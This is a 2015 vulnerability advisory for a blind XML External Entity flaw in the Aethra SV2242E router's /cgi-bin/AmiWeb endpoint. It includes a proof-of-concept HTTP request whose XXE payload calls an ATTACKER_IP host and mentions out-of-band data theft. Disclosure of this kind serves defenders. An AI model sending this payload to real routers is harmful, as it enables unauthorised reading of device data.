Aethra telecommunication XML External Entity vuln

2015.12.05

Credit: Ahmed Sultan

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Author : Ahmed Sultan
# Email : 0x4148@gmail.com
# Vuln. software : Aethra SV2242E
# Vendor site : aethra.it
# CVE : Requested , but haven't been assigned yet
# tested on : ATOS 5.6.x

The bug rise because of the remote user input to "/cgi-bin/AmiWeb" is not sensitized before being parsed which cause the availability of blind XXE attack that might result in reading sensitive data from the router system  
A proof of concept

POST /cgi-bin/AmiWeb HTTP/1.1
Content-type: application/xml
Host: ROUTER_IP
Content-Length: 155
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE root [ 
<!ENTITY % remote SYSTEM "http://ATTACKER_IP/0x4148_jnk"> 
%remote; 
%int; 
%trick;]> 

That will result in HTTP request to ATTACKER_IP/0x4148_jnk
further exploitation might be done by using OOB (Out Of Bound) XXE attacks to reach sensitive data on the server

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Aethra telecommunication XML External Entity vuln

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.